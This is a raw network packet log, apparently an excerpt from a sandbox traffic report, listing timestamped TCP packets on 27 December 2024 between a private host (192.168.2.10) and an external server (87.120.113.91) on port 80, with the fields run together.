                                                        Dec 27, 2024 14:53:45.886363029 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.886399984 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.887177944 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.887254953 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.887298107 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.887690067 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.887798071 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.887844086 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.888525009 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.888612032 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.888650894 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.889286995 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.889398098 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.889441013 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.890126944 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.890266895 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.890305042 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.890970945 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.891052961 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.891096115 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.891776085 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.891856909 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.891900063 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.892585039 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.892687082 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.892729998 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.893381119 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.893534899 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.893570900 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.894237041 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.894320965 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.894365072 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.895020008 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.895121098 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.895160913 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.895798922 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.943834066 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.976979017 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.977109909 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.977169037 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.977327108 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.977392912 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.977436066 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.977989912 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.978012085 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.978179932 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.978765965 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.978853941 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.978907108 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.990549088 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.990638971 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.990705967 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.990859985 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.990978956 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.991025925 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.991710901 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.991801977 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.991838932 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.992485046 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.992614031 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.992664099 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.993310928 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.993415117 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.993462086 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.994127989 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.994239092 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.994282961 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.994968891 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.995167017 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.995204926 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.995784044 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.995898008 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.995939970 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.996577978 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.996767044 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.996808052 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.997420073 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.997555971 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.997601986 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.998246908 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.998398066 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.998435974 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.999075890 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.999181032 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.999233961 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.999874115 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.999906063 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.999943018 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.000664949 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.000798941 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.000838995 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.001595974 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.001677036 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.001730919 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.002321005 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.002445936 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.002485037 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.003144026 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.003257990 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.003304958 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.004065990 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.004116058 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.004175901 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.004802942 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.004915953 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.004961967 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.005616903 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.005731106 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.005769968 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.006597996 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.006618977 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.006655931 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.007488966 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.007539034 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.007581949 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.008093119 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.008260965 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.008304119 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.008908987 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.008996010 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.009040117 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.009687901 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.009772062 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.009809017 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.010520935 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.010618925 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.010658026 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.011605024 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.011615992 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.011661053 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.078846931 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.078962088 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.079020977 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.079190016 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.079297066 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.079317093 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.079333067 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.080121040 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.080164909 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.080226898 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.089694977 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.089751005 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.089751959 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.089764118 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.089801073 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.089828014 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.089888096 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.089900970 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.089915037 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.089924097 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.089946032 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.090131044 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.090142965 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.090156078 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.090173006 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.090182066 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.090219021 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.090265036 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.090276957 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.090287924 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.090308905 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.090348959 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.090362072 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.090373039 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.090384960 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.090389967 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.090401888 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.090415001 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.090435028 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.090544939 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.090590954 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.090634108 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.090635061 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.090647936 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.090661049 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.090686083 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.090766907 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.090806961 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.090955973 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.091578960 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.091614008 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.091680050 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.092395067 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.092442036 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.092474937 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.093221903 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.093259096 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.093291998 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.094050884 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.094125986 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.094183922 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.094840050 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.094881058 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.094952106 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.095675945 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.095721006 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.095741034 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.096482992 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.096529007 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.096579075 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.097273111 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.097316980 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.178606033 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.178618908 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.178698063 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.178704977 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.178781033 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.178822041 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.179368973 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.179483891 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.179532051 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.180213928 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.180272102 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.180311918 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.192150116 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.192253113 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.192327976 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.192511082 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.192625046 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.192671061 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.193355083 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.193448067 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.193490028 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.194164038 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.194303989 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.194344044 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.194956064 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.195066929 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.195105076 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.195769072 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.195902109 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.195943117 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.196580887 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.196687937 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.196727037 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.197365999 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.197503090 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.197551012 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.198225975 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.198323965 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.198364019 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.199119091 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.199157953 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.199198961 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.199875116 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.199950933 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.199994087 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.200891972 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.201132059 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.201170921 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.201666117 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.201754093 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.201813936 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.202275991 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.202387094 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.202428102 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.203226089 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.203334093 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.203385115 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.203910112 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.204088926 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.204130888 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.205205917 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.205317974 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.205373049 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.205784082 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.205889940 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.205931902 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.206348896 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.206480026 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.206522942 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.207225084 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.207295895 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.207335949 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.208081961 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.208312035 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.208348989 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.208875895 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.208935976 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.208976030 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.209671974 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.209717989 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.209760904 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.210436106 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.210550070 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.210587025 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.211257935 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.211370945 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.211419106 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.212085962 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.212201118 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.212249041 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.212898016 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.212973118 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.213017941 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.280213118 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.280280113 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.280385017 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.280617952 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.280729055 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.280766964 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.281454086 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.281578064 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.281610966 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.282248974 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.282367945 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.282407999 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.283149004 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.283193111 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.283225060 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.283905983 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.284003019 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.284037113 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.284796953 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.284918070 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.284951925 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.285521030 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.285634041 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.285672903 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.286324978 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.286441088 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.286477089 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.287147999 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.287270069 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.287306070 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.287988901 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.288095951 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.288132906 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.288791895 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.288897991 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.288938999 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.289613962 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.289725065 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.289762974 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.290489912 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.290527105 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.290561914 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.291310072 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.291397095 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.291435957 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.292071104 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.292171955 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.292203903 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:46.292886019 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.293024063 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:46.293056965 CET4972180192.168.2.1087.120.113.91
